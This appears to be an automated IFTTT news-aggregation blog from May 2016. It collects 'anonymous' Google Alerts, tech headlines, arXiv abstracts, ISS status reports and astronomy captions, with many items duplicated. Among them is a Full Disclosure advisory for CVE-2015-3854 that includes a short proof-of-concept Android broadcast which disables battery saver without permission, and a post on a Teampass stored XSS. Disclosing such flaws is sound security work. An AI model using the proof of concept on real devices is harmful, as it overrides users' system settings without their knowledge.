Profile page for the free company Anonymous Pillar Men.
from Google Alert - anonymous http://ift.tt/25q0K27
via IFTTT
Saturday, May 28, 2016
Queen B-day gets anonymous 'donation'
A street party to celebrate the 90th birthday of British Queen Elizabeth II has received a 100,000-pound donation from an anonymous person branded ...
from Google Alert - anonymous http://ift.tt/1siTnLy
via IFTTT
from Google Alert - anonymous http://ift.tt/1siTnLy
via IFTTT
I have a new follower on Twitter
Samimi Yazar
Twitter Çılgını | yozgat | istanbul
Following: 19564 - Followers: 112838
May 28, 2016 at 06:12AM via Twitter http://twitter.com/samimiyazariz
The Great Carina Nebula
A jewel of the southern sky, the Great Carina Nebula, also known as NGC 3372, spans over 300 light-years, one of our galaxy's largest star forming regions. Like the smaller, more northerly Great Orion Nebula, the Carina Nebula is easily visible to the unaided eye, though at a distance of 7,500 light-years it is some 5 times farther away. This gorgeous telescopic close-up reveals remarkable details of the region's central glowing filaments of interstellar gas and obscuring cosmic dust clouds. The field of view is over 50 light-years across. The Carina Nebula is home to young, extremely massive stars, including the stars of open cluster Trumpler 14 (below and right of center) and the still enigmatic variable Eta Carinae, a star with well over 100 times the mass of the Sun. Eta Carinae is the brightest star, seen here just above the dusty Keyhole Nebula (NGC 3324). While Eta Carinae itself maybe on the verge of a supernova explosion, X-ray images indicate that the Great Carina Nebula has been a veritable supernova factory. via NASA http://ift.tt/1ORra3a
Member Resources
By submitting this form, you are granting: The Augustine Fellowship, S.L.A.A., 1550 NE Loop 410, San Antonio, Texas, 78209, United States, ...
from Google Alert - anonymous http://ift.tt/1qQBFh8
via IFTTT
from Google Alert - anonymous http://ift.tt/1qQBFh8
via IFTTT
Friday, May 27, 2016
Unseen Anonymous Photo Sharing
Camera, feeds, anonymous sharing and conversations. GetUnseen.com.
from Google Alert - anonymous http://ift.tt/1P4Nf3N
via IFTTT
from Google Alert - anonymous http://ift.tt/1P4Nf3N
via IFTTT
An Armenian Wishlist for Anonymous
BY GAREN YEGPARIAN. As you probably know, “Anonymous” is an ultra-secretive, underground, very loosely “organized” group of hackers whose ...
from Google Alert - anonymous http://ift.tt/1TK6mPD
via IFTTT
from Google Alert - anonymous http://ift.tt/1TK6mPD
via IFTTT
Facebook Ads now Tracks you, Even if you don't have an Account
There's nowhere to hide across the web, especially from the marketing and advertising companies. If you are paranoid about your privacy, you may get upset to know that Facebook will now track and deliver targeted Ads on other apps and websites for everyone, even if you do not have Facebook accounts. Until now, Facebook was showing targeted ads only to its users, but now the social networking
from The Hacker News http://ift.tt/1NSAdpM
via IFTTT
from The Hacker News http://ift.tt/1NSAdpM
via IFTTT
Ravens: Rookie Keenan Reynolds can defer his military service to play in NFL, Sec. of Defense Ashton Carter announces (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
via IFTTT
How to get Anonymous Ravkav
I'm planning to stay in Israel for around a month and was thinking of getting an "anonymous" ravkav since I am not an Israeli citizen. 1. How do I apply?
from Google Alert - anonymous http://ift.tt/1OSd69F
via IFTTT
from Google Alert - anonymous http://ift.tt/1OSd69F
via IFTTT
Google Wins Epic Java Copyright Case Against Oracle
Google has finally won six-year long $9-billion legal battle with Oracle over the use of Java APIs in Android. Oracle filed its lawsuit against Google in 2010, claiming that the company illegally used 11,500 lines of Java code in its Android operating system, violating copyrights owned by Oracle. However, a federal jury of ten people concluded Thursday that Google's use of Java constituted "
from The Hacker News http://ift.tt/1qP3Hts
via IFTTT
from The Hacker News http://ift.tt/1qP3Hts
via IFTTT
Ravens: DT Timmy Jernigan changes his number to No. 99 to honor Warren Sapp; Hall of Famer tweets \"how do I stop this?\" (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
via IFTTT
I have a new follower on Twitter
Berat
❤️GÖZTEPE ❤️https://t.co/t15UT6yetL snapchat : beratkamisligol
İZMİR
Following: 2490 - Followers: 16776
May 27, 2016 at 09:51AM via Twitter http://twitter.com/Beraattk
ISS Daily Summary Report – 05/26/16
Bigelow Expandable Aerospace Module (BEAM) Inflation: The crew began inflation operations this morning. During the course of two hours, the crew slowly pressurized BEAM using ISS cabin air, but BEAM only moved ~5 inches compared to the expected 72 inches in displacement and increased from 12 inches compared to the expected ~34 inches of increase in diameter. Once the pressure rose above the maximum planned levels, teams agreed to stand down on operations to discuss the forward plan and analyze the situation. There will be no inflation attempts tomorrow. BEAM pressures will be checked overnight and tomorrow morning. The ISS and BEAM are in safe configuration. Auxin Transport Run #2: Following a three day incubation of samples in the Cell Biology Experiment Unit (CBEF), the crew completed fixation of those samples, which closes out the Auxin Transport experiment run. The Japan Aerospace Exploration Agency (JAXA) Auxin Transport investigation clarifies the role of auxins in pea and maize (corn) seedlings grown in microgravity, leading to new insight into how gravity, or the lack of gravity, affects plant development. This study is expected to contribute to increasing efficiency of plant cultivation in plant factories. The data obtained from the second experiment run will provide evidence of spaceflight‐alterations in auxin polar transport and endogenous levels of auxin, resulting in automorphogenesis. Human Research Facility (HRF) Resupply: The crew removed expired limited life items and resupplied with fresh items with coordination from the ground. Photos of the new items and their location were downlinked for review and verification by ground teams. Treadmill 2 (T2) Inspection: The crew completed this monthly maintenance to inspect the bungee shackle key mount witness marks, Y-Axis isolators, 2 bottom snubbers and all 4 snubber arms for signs of free play. No issues were reported. Compound Specific Analyzer-Combustion Products (CSA-CP) Maintenance: The crew completed this regularly scheduled maintenance to zero calibrate and replace battery packs in all CSA-CPs. Following these activities the units were deactivated. Today’s Planned Activities All activities were completed unless otherwise noted. MORZE. Evaluation using SPRUT-2 MAGVEC Disconnection of MagVector Umbilicals from COL1F2 UIP Folding ARED Platform BEAM Extended Leak Check MAGVEC Hardware Connection SEISMOPROGNOZ. Downlink data from Control and Data Acquisition Module (МКСД) HDD (start) r/g 2224 HRF2 Supply Kit Resupply Surface samples from FGB equipment and structures / r/g 2354 MORZE. Psycho-physiological Evaluation: Tsentrovka Node3 Camera Setup BEAM Preparation for Manual Inflation BEAM. Deployment Controller Run 1 BAR. Experiment Ops / r/g 2361 BEAM NSI (NASA Standard Initiator, aka pyro) Circuit Check MORZE. Psycho-physiological Evaluation: Cattell’s Test BEAM. Deployment Controller, Activation and charge monitoring MAGVEC MagVector umbilicals re-mating to COL1F2 UIP BEAM. Deployment Controller Run 2 BEAM Manual Inflation [Aborted] MORZE. Psycho-physiological Evaluation: Strelau Test Scheduled Maintenance of Compound Specific Analyzer- Combustion Products (CSA-CP) Cygnus Cargo Operations Verification of ИП-1 Flow Sensor Position BEAM Preparation for auto pressurization [Deferred] BEAM. Deployment Controller Run 3 [Deferred] MORZE. Psycho-physiological Evaluation: SUPOS Test BEAM. Deployment Controller, deactivation and stowage [Deferred] SEISMOPROGNOZ. Download data from Control and Data Acquisition Module (МКСД) HDD (end) and start backup r/g 2224 BEAM Pressure and Temperature Reading [Deferred] Download of log-files from БСПН P/L Server and БЗУ memory storage device / r/g 2364 BEAM Vestibule reconfiguration after completion of BEAM deployment [Deferred] MORZE. Closeout Ops СОЖ Maintenance AUT Hardware Gather ARED Footplate Unfold to Nominal Position RWS Power Down MELFI Ice Brick Insertion Crew OBT, Crew Medical Officer (CMO), Computer based training XF305 Camcorder Settings Adjustment AUT R2 Hardware Removal AUT R2 Sample fixation ALGOMETRIA. Experiment Ops / r/g 1808 BRI service data download from RSS1 laptop / r/g 2052 Cleaning fan screens on FGB interior panels (116, 316, 231, 431) Cygnus Cargo Operations GREAT START. Video Script Review r/g 2353 GREAT START. Preparation for the Experiment / r/g 2353 OTKLIK. Equipment Check / r/g 1588 GREAT START. EPO session and video recording of Regeneratsiya experiment / r/g 2353 Cygnus Cargo Operations Conference MELFI 2 Ice Brick Insertion AUT Sample Insertion into MELFI AUT R2 Hardware Removal AUT R2 Sample fixation GREAT START. Closeout Ops / r/g 2353 Monthly Inspection of T2 Treadmill System INTERACTION-2. Experiment Ops / r/g 2350 SAMS-CU CREW Space Acceleration Measurement System Control Unit Activation Health Maintenance System (HMS) Fundoscope Setup IMS Delta File Prep INTERACTION-2. Experiment Ops / r/g 2351 AUT Sample Insertion into MELFI AUT R2 Closeout Ops Fundoscope Eye Exam Inspection and photos of space behind SM panels / r/g 2334 Health Maintenance System (HMS) Fundoscope Setup Hematocrit Hardware Setup r/g 2362 Fundoscope Eye Exam Health Maintenance System (HMS) – Fundoscope Teardown and Stowage Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. BEAM activities Nominal ground commanding Three-Day Look Ahead: Friday, 05/27: Vascular Echo ultrasound, Ocular Health, Cygnus cargo transfer Saturday, 05/28: Crew off duty, housekeeping Sunday, 05/29: Crew off duty QUICK ISS Status – Environmental Control Group: Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Idle Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up
from ISS On-Orbit Status Report http://ift.tt/1Rwm0th
via IFTTT
from ISS On-Orbit Status Report http://ift.tt/1Rwm0th
via IFTTT
Anonymous US Collector Buys 'Holy Grail of Publishing'
Anonymous U.S. Collector Buys 'Holy Grail of Publishing'. Duration: 01:13 18 hrs ago. SHARE · TWEET · SHARE · EMAIL. Christie's Auction House in ...
from Google Alert - anonymous http://ift.tt/1P2EJlU
via IFTTT
from Google Alert - anonymous http://ift.tt/1P2EJlU
via IFTTT
Using an anonymous method to assign a delegate to an action (task 2 of 3).
using System; namespace Treehouse.CodeChallenges { public class Program { public Func<int, int> Square = delegate (int number) { return number ...
from Google Alert - anonymous http://ift.tt/25lICq1
via IFTTT
from Google Alert - anonymous http://ift.tt/25lICq1
via IFTTT
Adult-Themed Candy with Anonymous Shipping (1, 5, or 10 Bags)
Promotional value expires 90 days after purchase. Amount paid never expires. Promotional value expires 3 months from purchase date. Amount paid ...
from Google Alert - anonymous http://ift.tt/27UQaT1
via IFTTT
from Google Alert - anonymous http://ift.tt/27UQaT1
via IFTTT
I have a new follower on Twitter
Ahmet Sevim
Avcılar | Beylikdüzü
İstanbul
https://t.co/ReZUtVqraY
Following: 22830 - Followers: 1766370
May 27, 2016 at 01:21AM via Twitter http://twitter.com/AhmetSevimm
IC 5067 in the Pelican Nebula
The prominent ridge of emission featured in this sharp, colorful skyscape is cataloged as IC 5067. Part of a larger emission nebula with a distinctive shape, popularly called The Pelican Nebula, the ridge spans about 10 light-years following the curve of the cosmic pelican's head and neck. This false-color view also translates the pervasive glow of narrow emission lines from atoms in the nebula to a color palette made popular in Hubble Space Telescope images of star forming regions. Fantastic, dark shapes inhabiting the 1/2 degree wide field are clouds of cool gas and dust sculpted by the winds and radiation from hot, massive stars. Close-ups of some of the sculpted clouds show clear signs of newly forming stars. The Pelican Nebula, itself cataloged as IC 5070, is about 2,000 light-years away. To find it, look northeast of bright star Deneb in the high flying constellation Cygnus. via NASA http://ift.tt/1qLt7rO
Thursday, May 26, 2016
Philippines Bank hit by SWIFT Hacking Group linked to North Korea
SWIFT Bank Hackers have attacked another bank in the Philippines using the same modus operandi as that in the $81 Million Bangladesh Bank heist. Security researchers at Symantec have found evidence that malware used by the hacking group shares code similarities with the malware families used in targeted attacks against South Korean and US government, finance, and media organizations in 2009. <!-
from The Hacker News http://ift.tt/24aw4j0
via IFTTT
from The Hacker News http://ift.tt/24aw4j0
via IFTTT
A PAC RL Algorithm for Episodic POMDPs. (arXiv:1605.08062v1 [cs.LG])
Many interesting real world domains involve reinforcement learning (RL) in partially observable environments. Efficient learning in such domains is important, but existing sample complexity bounds for partially observable RL are at least exponential in the episode length. We give, to our knowledge, the first partially observable RL algorithm with a polynomial bound on the number of episodes on which the algorithm may not achieve near-optimal performance. Our algorithm is suitable for an important class of episodic POMDPs. Our approach builds on recent advances in method of moments for latent variable model estimation.
from cs.AI updates on arXiv.org http://ift.tt/1Rv5WIo
via IFTTT
Deep Predictive Coding Networks for Video Prediction and Unsupervised Learning. (arXiv:1605.08104v1 [cs.LG])
While great strides have been made in using deep learning algorithms to solve supervised learning tasks, the problem of unsupervised learning - leveraging unlabeled examples to learn about the structure of a domain - remains a difficult unsolved challenge. Here, we explore prediction of future frames in a video sequence as an unsupervised learning rule for learning about the structure of the visual world. We describe a predictive neural network ("PredNet") architecture that is inspired by the concept of "predictive coding" from the neuroscience literature. These networks learn to predict future frames in a video sequence, with each layer in the network making local predictions and only forwarding deviations from those predictions to subsequent network layers. We show that these networks are able to robustly learn to predict the movement of synthetic (rendered) objects, and that in doing so, the networks learn internal representations that are useful for decoding latent object parameters (e.g. pose) that support object recognition with fewer training views. We also show that these networks can scale to complex natural image streams (car-mounted camera videos), capturing key aspects of both egocentric movement and the movement of objects in the visual scene, and generalizing across video datasets. These results suggest that prediction represents a powerful framework for unsupervised learning, allowing for implicit learning of object and scene structure.
from cs.AI updates on arXiv.org http://ift.tt/1sdSBj0
via IFTTT
Cognitive Dynamic Systems: A Technical Review of Cognitive Radar. (arXiv:1605.08150v1 [cs.AI])
We start with the history of cognitive radar, where origins of the PAC, Fuster research on cognition and principals of cognition are provided. Fuster describes five cognitive functions: perception, memory, attention, language, and intelligence. We describe the Perception-Action Cyclec as it applies to cognitive radar, and then discuss long-term memory, memory storage, memory retrieval and working memory. A comparison between memory in human cognition and cognitive radar is given as well. Attention is another function described by Fuster, and we have given the comparison of attention in human cognition and cognitive radar. We talk about the four functional blocks from the PAC: Bayesian filter, feedback information, dynamic programming and state-space model for the radar environment. Then, to show that the PAC improves the tracking accuracy of Cognitive Radar over Traditional Active Radar, we have provided simulation results. In the simulation, three nonlinear filters: Cubature Kalman Filter, Unscented Kalman Filter and Extended Kalman Filter are compared. Based on the results, radars implemented with CKF perform better than the radars implemented with UKF or radars implemented with EKF. Further, radar with EKF has the worst accuracy and has the biggest computation load because of derivation and evaluation of Jacobian matrices. We suggest using the concept of risk management to better control parameters and improve performance in cognitive radar. We believe, spectrum sensing can be seen as a potential interest to be used in cognitive radar and we propose a new approach Probabilistic ICA which will presumably reduce noise based on estimation error in cognitive radar. Parallel computing is a concept based on divide and conquers mechanism, and we suggest using the parallel computing approach in cognitive radar by doing complicated calculations or tasks to reduce processing time.
from cs.AI updates on arXiv.org http://ift.tt/1Z4wWnU
via IFTTT
The Symbolic Interior Point Method. (arXiv:1605.08187v1 [cs.AI])
A recent trend in probabilistic inference emphasizes the codification of models in a formal syntax, with suitable high-level features such as individuals, relations, and connectives, enabling descriptive clarity, succinctness and circumventing the need for the modeler to engineer a custom solver. Unfortunately, bringing these linguistic and pragmatic benefits to numerical optimization has proven surprisingly challenging. In this paper, we turn to these challenges: we introduce a rich modeling language, for which an interior-point method computes approximate solutions in a generic way. While logical features easily complicates the underlying model, often yielding intricate dependencies, we exploit and cache local structure using algebraic decision diagrams (ADDs). Indeed, standard matrix-vector algebra is efficiently realizable in ADDs, but we argue and show that well-known optimization methods are not ideal for ADDs. Our engine, therefore, invokes a sophisticated matrix-free approach. We demonstrate the flexibility of the resulting symbolic-numeric optimizer on decision making and compressed sensing tasks with millions of non-zero entries.
from cs.AI updates on arXiv.org http://ift.tt/1sdSN1F
via IFTTT
Probabilistic Inference Modulo Theories. (arXiv:1605.08367v1 [cs.AI])
We present SGDPLL(T), an algorithm that solves (among many other problems) probabilistic inference modulo theories, that is, inference problems over probabilistic models defined via a logic theory provided as a parameter (currently, propositional, equalities on discrete sorts, and inequalities, more specifically difference arithmetic, on bounded integers).
While many solutions to probabilistic inference over logic representations have been proposed,
SGDPLL(T) is simultaneously (1) lifted, (2) exact and (3) modulo theories, that is, parameterized by a background logic theory.
This offers a foundation for extending it to rich logic languages such as data structures and relational data.
By lifted, we mean algorithms with constant complexity in the domain size (the number of values that variables can take). We also detail a solver for summations with difference arithmetic and show experimental results from a scenario in which SGDPLL(T) is much faster than a state-of-the-art probabilistic solver.
from cs.AI updates on arXiv.org http://ift.tt/1Z4wKFp
via IFTTT
Kronecker Determinantal Point Processes. (arXiv:1605.08374v1 [cs.LG])
Determinantal Point Processes (DPPs) are probabilistic models over all subsets a ground set of $N$ items. They have recently gained prominence in several applications that rely on "diverse" subsets. However, their applicability to large problems is still limited due to the $\mathcal O(N^3)$ complexity of core tasks such as sampling and learning. We enable efficient sampling and learning for DPPs by introducing KronDPP, a DPP model whose kernel matrix decomposes as a tensor product of multiple smaller kernel matrices. This decomposition immediately enables fast exact sampling. But contrary to what one may expect, leveraging the Kronecker product structure for speeding up DPP learning turns out to be more difficult. We overcome this challenge, and derive batch and stochastic optimization algorithms for efficiently learning the parameters of a KronDPP.
from cs.AI updates on arXiv.org http://ift.tt/1Rv6n5t
via IFTTT
Estimation of Passenger Route Choice Pattern Using Smart Card Data for Complex Metro Systems. (arXiv:1605.08390v1 [cs.AI])
Nowadays, metro systems play an important role in meeting the urban transportation demand in large cities. The understanding of passenger route choice is critical for public transit management. The wide deployment of Automated Fare Collection(AFC) systems opens up a new opportunity. However, only each trip's tap-in and tap-out timestamp and stations can be directly obtained from AFC system records; the train and route chosen by a passenger are unknown, which are necessary to solve our problem. While existing methods work well in some specific situations, they don't work for complicated situations. In this paper, we propose a solution that needs no additional equipment or human involvement than the AFC systems. We develop a probabilistic model that can estimate from empirical analysis how the passenger flows are dispatched to different routes and trains. We validate our approach using a large scale data set collected from the Shenzhen metro system. The measured results provide us with useful inputs when building the passenger path choice model.
from cs.AI updates on arXiv.org http://ift.tt/1sdSBzr
via IFTTT
CITlab ARGUS for historical handwritten documents. (arXiv:1605.08412v1 [cs.CV])
We describe CITlab's recognition system for the HTRtS competition attached to the 13. International Conference on Document Analysis and Recognition, ICDAR 2015. The task comprises the recognition of historical handwritten documents. The core algorithms of our system are based on multi-dimensional recurrent neural networks (MDRNN) and connectionist temporal classification (CTC). The software modules behind that as well as the basic utility technologies are essentially powered by PLANET's ARGUS framework for intelligent text recognition and image processing.
from cs.AI updates on arXiv.org http://ift.tt/1Z4wW7o
via IFTTT
Doubly Robust Off-policy Value Evaluation for Reinforcement Learning. (arXiv:1511.03722v3 [cs.LG] UPDATED)
We study the problem of off-policy value evaluation in reinforcement learning (RL), where one aims to estimate the value of a new policy based on data collected by a different policy. This problem is often a critical step when applying RL in real-world problems. Despite its importance, existing general methods either have uncontrolled bias or suffer high variance. In this work, we extend the doubly robust estimator for bandits to sequential decision-making problems, which gets the best of both worlds: it is guaranteed to be unbiased and can have a much lower variance than the popular importance sampling estimators. We demonstrate the estimator's accuracy in several benchmark problems, and illustrate its use as a subroutine in safe policy improvement. We also provide theoretical results on the hardness of the problem, and show that our estimator can match the lower bound in certain scenarios.
from cs.AI updates on arXiv.org http://ift.tt/1QlaMN5
via IFTTT
Auxiliary Deep Generative Models. (arXiv:1602.05473v2 [stat.ML] UPDATED)
Deep generative models parameterized by neural networks have recently achieved state-of-the-art performance in unsupervised and semi-supervised learning. We extend deep generative models with auxiliary variables which improves the variational approximation. The auxiliary variables leave the generative model unchanged but make the variational distribution more expressive. Inspired by the structure of the auxiliary variable we also propose a model with two stochastic layers and skip connections. Our findings suggest that more expressive and properly specified deep generative models converge faster with better results. We show state-of-the-art performance within semi-supervised learning on MNIST, SVHN and NORB datasets.
from cs.AI updates on arXiv.org http://ift.tt/1Oh5oUN
via IFTTT
Hierarchical Compound Poisson Factorization. (arXiv:1604.03853v2 [cs.LG] UPDATED)
Non-negative matrix factorization models based on a hierarchical Gamma-Poisson structure capture user and item behavior effectively in extremely sparse data sets, making them the ideal choice for collaborative filtering applications. Hierarchical Poisson factorization (HPF) in particular has proved successful for scalable recommendation systems with extreme sparsity. HPF, however, suffers from a tight coupling of sparsity model (absence of a rating) and response model (the value of the rating), which limits the expressiveness of the latter. Here, we introduce hierarchical compound Poisson factorization (HCPF) that has the favorable Gamma-Poisson structure and scalability of HPF to high-dimensional extremely sparse matrices. More importantly, HCPF decouples the sparsity model from the response model, allowing us to choose the most suitable distribution for the response. HCPF can capture binary, non-negative discrete, non-negative continuous, and zero-inflated continuous responses. We compare HCPF with HPF on nine discrete and three continuous data sets and conclude that HCPF captures the relationship between sparsity and response better than HPF.
from cs.AI updates on arXiv.org http://ift.tt/23w57Lt
via IFTTT
Ravens: Ray Rice spoke to Baltimore rookies Thursday; believed to be first time he was at facility since being released (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
via IFTTT
Blan PD receives anonymous $50K donation
BLANCHESTER — The Blanchester Police Department received a $50,000 donation Thursday from a resident wishing to remain anonymous. “It is the ...
from Google Alert - anonymous http://ift.tt/1WnPBxb
via IFTTT
from Google Alert - anonymous http://ift.tt/1WnPBxb
via IFTTT
Anonymous $15k Donation to City of Holland
HOLLAND (WHTC) -- Holland Youth Connections could receive up to $15000 from an anonyous donor if the donation is matched through community ...
from Google Alert - anonymous http://ift.tt/1RuPMP1
via IFTTT
from Google Alert - anonymous http://ift.tt/1RuPMP1
via IFTTT
NFL: Ravens forfeit 1 week of June OTAs, plus team and John Harbaugh fined for violating offseason rules at rookie camp (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
via IFTTT
Raspberry Pi 3 to get official Android OS support
It's fair to say the success of the ARM-powered Raspberry Pi computers have surpassed expectations and have been a godsend to hobbyists, hackers, and students. If you're one of those people looking for unofficial hacks to install Android OS on a Raspberry Pi device, then stop and wait for the official release. Raspberry Pi computers have largely been Linux affairs, as several Linux
from The Hacker News http://ift.tt/1OPHLEy
via IFTTT
from The Hacker News http://ift.tt/1OPHLEy
via IFTTT
I have a new follower on Twitter
erpscan
ERPScan. Detect and Prevent Cyberattacks in SAP and Oracle business-critical ERP systems
Palo Alto, CA
http://t.co/eF2IkBDTom
Following: 1953 - Followers: 1767
May 26, 2016 at 11:25AM via Twitter http://twitter.com/erpscan
Anonymous Tip Leads to Drug Arrest
A Chillicothe woman is facing felony charges after an anonymous tip led to the discovery of items used in the manufacture of methamphetamine.
from Google Alert - anonymous http://ift.tt/25jZxJI
via IFTTT
from Google Alert - anonymous http://ift.tt/25jZxJI
via IFTTT
Re: [FD] Teampass v2.1.26 - Stored Cross Site Scripting Vulnerability
Hi Ulisses, The XSS found is a different one. The one mentioned on http://ift.tt/1TFA3Bc has a screenshot where the XSS is inserted when creating a new role and by preventing the javascript filters to execute. A new role can only be created by the admin user. This XSS is also performed by inserting the
Re: [FD] CVE-2015-3854 Battery permission leakage in Android
The Credit of this vulnerability is to Qidan He (@flanker_hqd) from KeenLab(http://ift.tt/1scxEoI), Tencent.
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] CVE-2015-3854 Battery permission leakage in Android
Hi: I'm posting some vulnerabilities I reported to Android and fixed last year prior to the Android Security Bounty program launch. Since there're no public bulletins for these ancient reports, I'm writing to the maillist for the record. Details ======= A permission leakage exists in Android 5.x that enables a malicious application to acquire the system-level protected permission of DEVICE_POWER. There exists a permission leakage in packages/SystemUI/src/com/android/systemui/power/PowerNotificationWarnings.java, An attacker app without any permission can turn off battery save mode (which should be guarded by DEVICE_POWER permission, which is a system permission, lead to permission leakage), dismiss low battery notification. ##Analysis The PowerNotificationWarnings registered a dynamic receiver without permission guard, listening for the following actions: - PNW.batterySettings - PNW.startSaver - PNW.stopSaver - PNW.dismissedWarning The PNW.stopSaver will call setSaverMode(fals e), thus call mPowerMan.setPowerSaveMode(false), which finally calls PowerManager.setPowerSaveMode(false). ```java (code of PowerNotificationWarnings.java) private final class Receiver extends BroadcastReceiver { public void init() { IntentFilter filter = new IntentFilter(); filter.addAction(ACTION_SHOW_BATTERY_SETTINGS); filter.addAction(ACTION_START_SAVER); filter.addAction(ACTION_STOP_SAVER); filter.addAction(ACTION_DISMISSED_WARNING); mContext.registerReceiverAsUser(this, UserHandle.ALL, filter, null, mHandler); } @Override public void onReceive(Context context, Intent intent) { final String action = intent.getAction(); Slog.i(TAG, "Received " + action); if (action.equals(ACTION_SHOW_BATTERY_SETTINGS)) { dismissLowBatteryNotification(); mContext.startActivityAsUser(mOpenBatterySettings, UserHandle.CURRENT); } else if (action.equals(ACTION_START_SAVER)) { dismissLowBatteryNotification(); showStartSaverConfirmation(); } else if (action.equals(ACTION_STOP_SAVER)) { dismissSaverNotification(); dismissLowBatteryNotification(); setSaverMode(false);//PERMISSION LEAK HERE! } else if (action.equals(ACTION_DISMISSED_WARNING)) { dismissLowBatteryWarning(); } } ``` An ordinary app cannot directly call this method because this API call is guarded by system permission DEVICE_POWER, however by sending a broadcast with action "PNW.stopSaver", it can trigger this API call on behave of SystemUI, thus stops battery saver without user action and awareness. Tested on Nexus 6/Nexus 7 (5.1.1) ##POC code(do not require any permission) Intent intent = new Intent(); intent.setAction("PNW.stopSaver"); sendBroadcast(intent); ##Possible mitigations Use a local broadcast mechanism, or use permission to guide the dynamic receiver. ##Official fixes: fixed in http://ift.tt/1qLvZ8j ##Report timeline 2015.5.6 Initial report to security@android.com 2015.5.8 Android Security Team acks and assigned ANDROID-20918350 2015.6.1 The bug is fixed in Android internal branch 2015.7.24 CVE Requested, assigned CVE-2015-3854 2016.5.26 Public Disclosure
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
Check anonymous users only if session has started
Hello, We have a situation where anonymous user ip is required only when he started an active session. I have added a simple check on the hook init.
from Google Alert - anonymous http://ift.tt/1TGj1mt
via IFTTT
from Google Alert - anonymous http://ift.tt/1TGj1mt
via IFTTT
ISS Daily Summary Report – 05/25/16
Microgravity Science Glovebox (MSG) High Definition (HD) Video Drawer Checkout: Following yesterday’s installation of the new HD video drawer and two HD video monitors, the crew continued the upgrade process for the MSG video equipment by completing checkout activities. After the hardware was set up and powered, the video signals were routed using the HD Video Drawer Graphical User Interface (GUI) located as a remote desktop application on the MSG Laptop Computer. The MSG HD video hardware was stowed following completion of the checkout activities. Fine Motor Skills: A series of interactive tasks were completed for the Fine Motor Skills investigation. This investigation is the first fine motor skills study to measure long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth’s gravity. Dose Tracker: The crew completed entries for medication tracking. This investigation documents the medication usage of crew members before and during their missions by capturing data regarding medication use during spaceflight, including side effect qualities, frequencies and severities. The data is expected to either support or counter anecdotal evidence of medication ineffectiveness during flight and unusual side effects experienced during flight. It is also expected that specific, near-real-time questioning about symptom relief and side effects will provide the data required to establish whether spaceflight-associated alterations in pharmacokinetics (PK) or pharmacodynamics (PD) is occurring during missions. Habitability Human Factors Directed Observations: The crew recorded and submitted a walk-through video documenting observations of an area or activity providing insight related to human factors and habitability. The investigation collects information about the relationship between crew members and their environment on the ISS. Observations can help spacecraft designers understand how much habitable volume is required and whether a mission’s duration impacts how much space crew members need. Bigelow Expandable Aerospace Module (BEAM) Vestibule Outfitting: The crew completed Node 3 (N3) Aft vestibule pressurization and leak check, opened the hatch, and completed installation and hardware deployment in N3 Aft BEAM Vestibule for all of the equipment required to support tomorrow’s planned BEAM deployment. Completed tasks were: Common Berthing Mechanism (CBM) Control Panel Assembly (CPA) and Center Disc Cover (CDC) removal, ground strap installation, deployment of BEAM deployment controller with associated cables except for power cable, deployment of multimeter with BEAM Resistive Thermal Device (RTD) jumper, installation of BEAM Vestibule data cable. BEAM ingress is scheduled for June 2. OA-6 Cargo Transfer Operations: Today the crew completed OA-6 unpack. Today’s Planned Activities All activities were completed unless otherwise noted. MORZE. Evaluation using SPRUT-2 Calf Volume Measurement / r/g 2338 FINEMOTR Operator Assistance with the Experiment Folding ARED Platform Node 3 Aft Pressurization and Leak Check RR-HAB BAG Rodent Research Habitat Stowage Bag Retrieval Sample Insertion into bags COSMOCARD. Closeout Ops / r/g 2335 Node 3 Aft Hatch Opening Rodent Research (RR) Camcorder Setup FINEMOTR Experiment Ops Stowage of Rodent Research Habitat Module Removal and transfer of CBM disk cover MORZE. Psycho-physiological Evaluation: Tsentrovka, SENSOR Tests Removal of Node 3 Nadir CBM Controller Panel Assembly (CPA) Study of veins in lower extremities / r/g 2337 Rodent Research (RR) Module Stowage OCT Hardware Setup СОЖ Maintenance WRS Sample Collection BEAM Ground Strap Installation HABIT Habitability Walk-Through Video Inspection and Photos of space behind SM panels / r/g 2334 DOSETRK Data Input MORZE. Psycho-physiological Evaluation: SUPOS Test BEAM Vestibule Outfitting Part 1 VIZIR. Experiment Ops with СКПФУ Hardware r/g 2352 MORZE. Psycho-physiological Evaluation: Cattell’s Test Health Management System (HMS) Optical Coherence Tomography (OCT) Subject Health Management System (HMS) Optical Coherence Tomography (OCT), Operator MORZE. Psycho-physiological Evaluation: Strelau Test OCT Hardware Stowage Rodent Research (RR) Camcorder Setup BEAM Deployment Dynamic Sensors (DDS) Setup MORZE. Closeout Ops Robotic Work Station (RWS) Setup ARED Footplate Unfold to Nominal Position Potable Water Collection in SM for In-Flight Chemical and Microbial Analysis HMS Defibrillator Inspection MSG Video Recording Stowage of Rodent Research Habitat Module TOCA Potable Water Dispenser (PWD) Sample Analysis DOSETRK Data Input JEM Remote Sensor Unit Battery R&R Rodent Research (RR) Module Stowage HABIT Preparing for the experiment PK4 HD Data Download Life On The Station Photo and Video / r/g 2000 PK4- Preparation for Data Download Water Processing using MCD Inspection and Cleaning of Laptops RS2, RS3 СТТС comm system switchover to the primary set On MCC Go Inspection and Cleaning of RS1 Laptop Inspection and Photos of space behind SM panels / r/g 2334 AUT Sample Retrieval from MELFI AUT R2 Sample fixative application TOCA Data Recording MSG Video Recording Countermeasures System (CMS) Sprint Exercise, Optional IMS Delta File Prep INTERACTION-2. Experiment Ops / r/g 2349 MORZE. Experiment setup / r/g 2348 MSG Hardware Deactivation USOS High Definition (HD) Video setup for 